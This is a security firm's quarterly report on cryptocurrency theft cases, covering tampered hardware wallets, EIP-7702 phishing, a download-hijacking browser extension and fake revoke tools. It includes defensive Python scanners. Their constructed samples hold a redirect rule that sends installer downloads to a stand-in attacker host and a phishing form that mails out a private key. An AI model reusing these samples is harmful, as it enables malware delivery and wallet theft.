Since SlowMist launched the MistTrack stolen-funds form, we have received a large number of requests for help from victims every day, hoping for assistance in tracing and recovering funds, including quite a few victims who lost tens of millions of dollars. Based on this, this series analyzes common and rare malicious methods through the statistics and analysis of the theft reports received each quarter, helping industry participants better understand and prevent security risks and protect their assets.

According to our statistics, the MistTrack Team received a total of 429 theft forms in Q2 2025, 278 domestic and 151 overseas, and provided free community evaluation services for all of them. (Note: this data covers only cases submitted via the form and does not include cases that reached us by email or other channels.)

The MistTrack Team assisted 11 stolen clients in freezing/recovering about $11.95 million in funds in Q2.

Reasons for Theft

In Q2 of 2025, phishing became the top reason for theft. Next, we will highlight several typical cases to help everyone better avoid pitfalls, prevent theft, and protect their assets.

1. Fake Hardware Wallet

This quarter we encountered multiple theft incidents involving hardware wallets. Almost all of the victims felt they had taken adequate security measures, yet their actual handling of the device contained fatal gaps.

For instance, a victim contacted the SlowMist security team, stating that he had purchased a tampered cold wallet on Douyin, resulting in approximately $6.5 million in crypto assets being stolen.

(https://x.com/im23pds/status/1933763989215064545)

A similar case involved a user purchasing a hardware wallet from an e-commerce platform, with complete packaging and instructions. The attacker had activated the device in advance, recorded the mnemonic phrase, then repackaged the hardware wallet with a forged manual and sold it through unofficial channels. Once the user scanned the code to activate the device and transferred assets to the wallet address, the funds were immediately moved away, the standard pattern for theft via a fake wallet.

Some people also received a cold wallet as a 'winning gift.' Attackers disguised themselves as well-known manufacturers on social platforms, sending cold wallet devices for free under the guise of 'lottery' or 'airdrop.' The 'brand new sealed' real device looked intact, and users followed the 'user manual' to input their mnemonic phrases, never considering that this was a pre-set phishing device.

(https://x.com/DeFi_Hanzo/status/1936188462752735587)

Some attackers even used personal information leaked from previous data breaches to forge an 'official notification letter,' along with an 'upgraded hardware wallet,' claiming that 'the original device has security risks' and requesting users to migrate their mnemonic phrases to the new 'secure device.' These devices often contain malicious firmware or induce users to input their mnemonic phrases into forged software. Once migrated, the funds are immediately transferred away by the attackers.

(https://x.com/intell_on_chain/status/1924053862203212144)

We summarize that the problem does not actually lie with the 'cold wallet' itself, but rather in the general lack of user awareness regarding the authenticity of hardware wallets, secure initialization processes, and attack methods. Many users fall victim to the illusion of 'looking safe,' believing that using a cold wallet guarantees their safety, but in reality, this is just another form of 'social engineering.'

2. EIP-7702 Phishing

In Q2, a new type of phishing using EIP-7702 emerged. A user was targeted by the Inferno Drainer gang while attempting to authorize EIP-7702, resulting in a loss of over $140,000.

(https://etherscan.io/tx/0x1ddc8cecbcaad5396fdf59ff8cddd8edd15f82f1e26779e581b7a4785a5f5e06/advanced)

The attacker's methods are not complicated but somewhat 'creative.' In this case, the phishing did not involve delegating the user's EOA to an attacker-controlled 7702 contract; the delegate was not a phishing address at all, but the legitimate, already existing MetaMask: EIP-7702 Delegator (0x63c0c19a282a1B52b07dD5a65b58948A07DAE32B) set up a few days earlier. The phishing site used the batch-call mechanism of MetaMask: EIP-7702 Delegator to perform batch authorizations from the victim's address and complete the theft.

The high efficiency of this type of phishing attack fundamentally lies in the delegated mechanism change brought by EIP-7702 — a user's EOA address can be authorized to a certain contract, granting it the characteristics of that contract (such as batch transfers, batch authorizations, gas payment, etc.). If a user authorizes their address to a malicious contract, there is a risk; if a user authorizes their address to a legitimate contract but it is maliciously exploited by a phishing site, there is also a risk.

EIP-7702 indeed brings new possibilities for wallet experiences, but new capabilities also come with new risk boundaries. Before signing, try to ensure what you see is what you sign, and think carefully about 'who is being authorized and what they can do.' For more on risk prevention related to EIP-7702, please refer to our previous publication (In-depth Discussion on EIP-7702 and Best Practices).
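The two checks described above ('who is being authorized' and whether a delegation already exists on an address) can be automated. The following is an added example, not SlowMist's code or any wallet's implementation: it parses the EIP-7702 delegation designator that an EOA's code takes after delegation (the 23-byte value 0xef0100 followed by the delegate address) and reviews the fields of an authorization tuple that a user can reason about before signing. The allowlist of recognised delegator contracts is an assumption for illustration; the MetaMask delegator address in it is the one named in the case above.

```python
# Added example (not SlowMist's code): review an EIP-7702 delegation before and after signing.
#
# After an EIP-7702 authorization is applied, eth_getCode for the EOA returns the
# "delegation designator": 0xef0100 || <20-byte delegate address>.
DELEGATION_PREFIX = bytes.fromhex("ef0100")

# Assumed allowlist of delegator contracts a wallet is willing to recognise.
# The MetaMask address is the delegator named in the case discussed above.
KNOWN_DELEGATORS = {
    "0x63c0c19a282a1b52b07dd5a65b58948a07dae32b": "MetaMask: EIP-7702 Delegator",
}


def parse_delegation(code: bytes):
    """Return the delegate address if `code` is an EIP-7702 designator, else None.

    `code` is the raw bytes returned by eth_getCode for the EOA.
    A plain EOA returns empty code; a normal contract returns real bytecode.
    """
    if len(code) == 3 + 20 and code.startswith(DELEGATION_PREFIX):
        return "0x" + code[3:].hex()
    return None


def review_authorization(chain_id: int, delegate: str, expected_chain_id: int):
    """Return review findings for the (chain_id, address, nonce) tuple a user is asked to sign.

    Only the fields the user can reason about are examined; the nonce is consumed by the
    protocol and the signature fields do not exist until after signing.
    """
    findings = []
    # chain_id 0 is the EIP-7702 wildcard: the authorization is valid on every chain.
    if chain_id == 0:
        findings.append("chain_id is 0: this authorization can be replayed on every chain")
    elif chain_id != expected_chain_id:
        findings.append(f"chain_id {chain_id} does not match the wallet's chain {expected_chain_id}")

    label = KNOWN_DELEGATORS.get(delegate.lower())
    if label is None:
        findings.append(f"delegate {delegate} is not a recognised delegator contract")
    else:
        # A recognised delegate is not a safe delegate: in the case above a phishing site
        # drove the legitimate delegator's batch functions from the victim's own EOA.
        findings.append(
            f"delegate is {label}; any site that can make this EOA call it "
            "can still trigger batch approvals and transfers"
        )
    return findings


def review_account(code: bytes):
    """Describe the delegation state of an EOA from its on-chain code."""
    delegate = parse_delegation(code)
    if delegate is None:
        return "no EIP-7702 delegation on this account"
    label = KNOWN_DELEGATORS.get(delegate.lower(), "UNKNOWN contract")
    return f"account is delegated to {delegate} ({label})"


if __name__ == "__main__":
    # Constructed sample: code of an EOA delegated to the MetaMask delegator.
    sample_code = bytes.fromhex("ef0100" + "63c0c19a282a1b52b07dd5a65b58948a07dae32b")
    print(review_account(sample_code))
    for line in review_authorization(0, "0x63c0c19a282a1B52b07dD5a65b58948A07DAE32B", 1):
        print("-", line)
```

Checking the delegate against an allowlist answers only the first half of the question; the second half, what the delegate can do once the EOA is pointed at it, is exactly what the phishing site in this case exploited, which is why the example flags a recognised delegate as a capability rather than as a clean result.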

3. Malicious Browser Extensions

In Q2, we also encountered a very covert attack method — browser extensions disguised as security plugins. Users reported to us a Chrome extension called 'Osiris' that claimed to detect phishing links and suspicious websites; after in-depth analysis, we confirmed that it in fact had obvious phishing characteristics.

Attackers typically recommend it to targeted users on social platforms under the guise of 'educational' content, tricking them into installing it voluntarily. Once installed, the extension uses a browser interface to load web-request interception rules from the attacker's remote server. We found that these rules specifically intercept download requests for file types such as .exe, .dmg and .zip and silently replace the file the user intended to download with a malicious program.

More covertly, attackers also guide users to visit some official websites that people use daily, such as Notion, Zoom, etc. When users attempt to download installation packages from the official website, what they actually download is a substituted malicious program, but the browser's download source still shows 'official website,' making it hard to detect abnormalities.

These malicious codes can package critical data from the user's computer, including local data from the Chrome browser, Keychain, and other sensitive information, and upload it to the server controlled by the attacker. The attacker can then attempt to extract the victim's mnemonic phrases, private keys, or login credentials from this data, further stealing the user's crypto assets or even taking over their exchange accounts, social media accounts, etc.

We advise users not to casually install browser plugins or applications recommended by strangers, even if they look 'official.' Additionally, regularly clean up infrequently used or unknown source plugins in the browser, and try to use well-known plugin management tools or antivirus software to enhance detection.
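For anyone reviewing an extension before trusting it, the remotely loaded rule set described above is the artifact worth inspecting. The following is an added example, not SlowMist's code and not taken from the 'Osiris' extension: it audits a rule list in the Chrome declarativeNetRequest JSON format (an assumption; the post does not name the interface) and flags redirect rules whose match pattern targets installer and archive downloads, reporting where each redirect sends the request. The rule set is constructed for the example.

```python
# Added example (not SlowMist's code): audit extension request-interception rules for
# download hijacking. The rules are assumed to be in Chrome declarativeNetRequest format.
import json
from urllib.parse import urlparse

# Constructed sample: one benign block rule and two download-redirect rules of the kind
# described above (Notion/Zoom-style installer downloads rerouted to an attacker host).
SAMPLE_RULES = json.dumps([
    {"id": 1, "priority": 1,
     "action": {"type": "block"},
     "condition": {"urlFilter": "||known-phishing.example", "resourceTypes": ["main_frame"]}},
    {"id": 2, "priority": 2,
     "action": {"type": "redirect",
                "redirect": {"url": "https://cdn.attacker.example/Notion-Setup.dmg"}},
     "condition": {"urlFilter": "*.dmg", "resourceTypes": ["main_frame", "other"]}},
    {"id": 3, "priority": 2,
     "action": {"type": "redirect",
                "redirect": {"regexSubstitution": "https://cdn.attacker.example/\\1.exe"}},
     "condition": {"regexFilter": "^https://[^/]+/.*/([^/]+)\\.exe$",
                   "resourceTypes": ["main_frame", "other"]}},
])

# File types the post reports being intercepted, plus two common installer formats.
DOWNLOAD_EXTENSIONS = (".exe", ".dmg", ".zip", ".pkg", ".msi")


def targets_downloads(condition: dict) -> bool:
    """True if the rule's urlFilter or regexFilter mentions a download file type."""
    pattern = (condition.get("urlFilter") or condition.get("regexFilter") or "").lower()
    # A regex such as "\.exe$" still contains the substring ".exe".
    return any(ext in pattern for ext in DOWNLOAD_EXTENSIONS)


def redirect_destination(action: dict):
    """Extract where a redirect rule sends the request, whichever form it uses."""
    redirect = action.get("redirect", {})
    return (redirect.get("url")
            or redirect.get("regexSubstitution")
            or redirect.get("extensionPath"))


def audit_rules(rules_json: str):
    """Return one finding per redirect rule that rewrites download requests."""
    findings = []
    for rule in json.loads(rules_json):
        action = rule.get("action", {})
        if action.get("type") != "redirect":
            continue
        condition = rule.get("condition", {})
        if not targets_downloads(condition):
            continue
        dest = redirect_destination(action)
        host = urlparse(dest).netloc if dest and dest.startswith("http") else None
        findings.append({
            "id": rule.get("id"),
            "pattern": condition.get("urlFilter") or condition.get("regexFilter"),
            "destination": dest,
            "destination_host": host,
        })
    return findings


if __name__ == "__main__":
    for finding in audit_rules(SAMPLE_RULES):
        print(f"rule {finding['id']}: {finding['pattern']!r} -> {finding['destination_host']}")
```

A redirect rule is not malicious by itself, so the audit reports the destination host rather than a verdict: a download pattern rewritten to a host that is neither the extension itself nor the vendor's own domain is what a reviewer should question, and it is the reason the browser's download source can still show the official site while the bytes come from elsewhere.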

4. WeChat Account Theft

In Q2, we received many reports from users whose WeChat accounts appeared to have been stolen. After attackers took control of an account, they impersonated the victim to scam friends by offering low-priced USDT, causing the victim's friends to be deceived. More seriously, some attackers also changed the WeChat password, completely taking over the account, with the transfer of control happening quietly. Unlike traditional on-chain security risks, these incidents exploit the trust between acquaintances on social platforms.

(https://x.com/EnHeng456/status/1935155663635956085)

Currently, we cannot fully confirm how the attacker managed to steal the WeChat account, but through testing and observation, this type of account theft may follow a certain operational path:

  • The attacker has already obtained your WeChat account and password — possibly due to your registered email, phone number, or password being leaked on another platform, or using a weak password, or being subject to credential stuffing.

  • When logging into WeChat, if the system detects an 'unfamiliar device,' it triggers a secondary verification, one method of which is asking a 'frequently contacted friend' to help verify.

  • Our actual testing found that the definition of 'frequently contacted friends' is very loose; even if they just added you as a friend and occasionally said a few words in the group, the system might still recognize it as 'frequently contacted.'

  • If the attacker had previously added you as a friend and quietly lurked, once they obtained your account password, they could initiate a login request late at night or when you are not online, asking 'accomplice friends' to cooperate with verification codes, making the account theft likely successful.

The above path is just a speculation of possibilities; specific reasons need further investigation and analysis. But it at least indicates that the security boundary for Web3 users has expanded to the off-chain social layer.

5. Social Engineering Attacks

In Q2, we received a request for help from a user. He stated that his wallet indicated a 'risky authorization' and could not be revoked, with multiple clicks yielding no response. Initially, he thought it was related to some token swap authorization he had done before, so he contacted SlowMist, hoping for an investigation.

We checked through the block explorer and common revoke tools but did not find the authorization records he mentioned. Soon after, he sent another screenshot, but we noticed that the address in this screenshot was not the same as the one he initially sent. We then suggested he send the URL of the query tool to cross-verify related information.

We opened a website called Signature Checker (signature[.]land) and immediately felt something was off. The webpage is designed to look very similar to the well-known authorization management tool Revoke Cash; even the logo is quite similar. But upon closer inspection, it actually asks users to input their private keys to 'check risky signatures' — this alone is very clear phishing behavior. Next, we tested with different addresses and found that no matter which address was input, the website would 'detect' risky authorizations, with authorization times very close to the query time, giving a false sense of urgency that 'there is still time to revoke.' We also tried inputting a random test private key, and although the page displayed 'format error,' the network request was still sent. After analyzing the front-end code, we confirmed that this phishing website sends the user's input (including address and private key) to the attacker's email via EmailJS. It even calls the Etherscan API to verify that the address exists, further enhancing its credibility.

And the beginning of all this was merely an attacker saying to the victim in the comment section or private messages of a social platform: 'You have signed a phishing signature, please revoke the authorization as soon as possible.' Then they posted a link to this forged tool. What’s more frightening is that when the user begins to doubt the other party's identity, the other party can even transform and impersonate a SlowMist employee, attempting a secondary social engineering attack. This is no longer simple phishing; it's a series of traps.

The tactics of these social engineering attacks are not complicated, and they don't even involve advanced technology. However, they are very good at creating a sense of urgency and trust. They know that most users will instinctively panic when faced with vague but terrifying prompts like 'authorization risk' and will be eager to resolve the issue. Once this emotion is manipulated, it becomes very easy to gradually comply with many things that shouldn't be clicked or filled in.
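The two traits that gave the fake 'Signature Checker' away, a form field asking for a private key and front-end code that hands the input to a third-party mail-sending service, can both be found by static inspection of a page. The following is an added example, not SlowMist's code and not the actual front-end of signature[.]land: it scans an HTML document with the standard library parser, lists input fields whose attributes mention a private key or seed phrase, and reports references to hosted form-sending services in the page's scripts. The HTML is a constructed sample modelled on the description above; the service names in the marker list are assumptions for illustration, with EmailJS taken from the case.

```python
# Added example (not SlowMist's code): static scan of a page for private-key input fields
# and for scripts that ship form contents to a hosted sending service.
from html.parser import HTMLParser

# Words a legitimate revoke/authorization tool never needs to ask for.
SENSITIVE_WORDS = ("private key", "privatekey", "private_key", "seed phrase",
                   "mnemonic", "secret recovery")
# Assumed markers of hosted form-sending services; EmailJS is the one used in the case.
EXFIL_MARKERS = ("emailjs", "api.emailjs.com", "formspree", "webhook")

# Constructed sample modelled on the fake 'Signature Checker' described above.
SAMPLE_HTML = """
<html><head><title>Signature Checker</title>
<script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
</head><body>
<form id="check">
  <input name="address" placeholder="Wallet address">
  <input name="pk" type="password" placeholder="Enter your private key to check risky signatures">
  <button>Check</button>
</form>
<script>emailjs.send("service_x", "template_y", {address: a, pk: k});</script>
</body></html>
"""


class SecretInputScanner(HTMLParser):
    """Collect suspicious <input> fields and all script sources / inline script text."""

    def __init__(self):
        super().__init__()
        self.secret_inputs = []
        self.script_srcs = []
        self.inline_script = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: v for k, v in attrs if v is not None}
        if tag == "input":
            # name, id, placeholder and aria-label all count as the field's description
            text = " ".join(a.values()).lower()
            if any(word in text for word in SENSITIVE_WORDS):
                self.secret_inputs.append(a.get("name") or a.get("id") or "<unnamed>")
        elif tag == "script":
            self._in_script = True
            if a.get("src"):
                self.script_srcs.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline_script.append(data)


def scan_page(html: str) -> dict:
    """Return the secret-asking fields, the sending services referenced, and a verdict."""
    parser = SecretInputScanner()
    parser.feed(html)
    script_blob = " ".join(parser.script_srcs + parser.inline_script).lower()
    senders = sorted({m for m in EXFIL_MARKERS if m in script_blob})
    if parser.secret_inputs:
        verdict = "phishing-like: page asks for a private key or seed phrase"
    else:
        verdict = "no secret-asking input found"
    return {"secret_inputs": parser.secret_inputs,
            "third_party_senders": senders,
            "verdict": verdict}


if __name__ == "__main__":
    result = scan_page(SAMPLE_HTML)
    print(result["verdict"])
    print("fields:", result["secret_inputs"], "senders:", result["third_party_senders"])
```

The first finding is decisive on its own: no authorization checker needs a private key, so a page that asks for one is a phishing page regardless of how closely its layout copies Revoke Cash. The second finding explains where the input goes and matches what we observed, a client-side submit to a mail-sending service rather than any on-chain query.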

Final Note

Looking back at Q2, we see a very clear trend: the attackers' means do not seem to have become more sophisticated, but they are increasingly understanding 'human nature'; their methods are gradually extending from on-chain to off-chain, with browser extensions, social accounts, verification processes, and user habits becoming attack entry points. Ultimately, regardless of how technology evolves, two principles always apply:

  • Always maintain skepticism and continuous verification;

  • Be cautious with authorization signature operations; each signature could be an 'opening action,' and you need to confirm who is outside the door.

Additionally, we recommend everyone read the Blockchain Dark Forest Self-Rescue Manual (https://github.com/slowmist/Blockchain-dark-forest-selfguard-handbook/blob/main/README_CN.md) repeatedly. This manual covers not only survival skills but also the basic awareness needed to avoid becoming prey in the 'dark forest.'

If your cryptocurrency is unfortunately stolen, we will provide free community assistance services for case evaluation. You only need to submit a form according to the classification guide (funds stolen / encountered fraud / encountered extortion). Meanwhile, the hacker addresses you submit will also be synchronized to the SlowMist InMist Lab threat intelligence cooperation network for risk control. (Note: Chinese form submissions can be made at https://aml.slowmist.com/cn/recovery-funds.html, English form submissions at https://aml.slowmist.com/recovery-funds.html)

SlowMist has been deeply engaged in the field of anti-money laundering in cryptocurrency for many years, forming a complete and efficient solution covering compliance, investigation, and auditing, actively helping to build a healthy ecological environment for cryptocurrency, and providing professional services to the Web3 industry, financial institutions, regulatory bodies, and compliance departments. Among them, MistTrack is a compliance investigation platform that provides wallet address analysis, fund monitoring, and tracing, currently accumulating over 300 million address tags, more than 1,000 address entities, over 500,000 threat intelligence data, and over 90 million risk addresses, all of which provide strong protection to ensure the security of digital assets and combat money laundering crimes.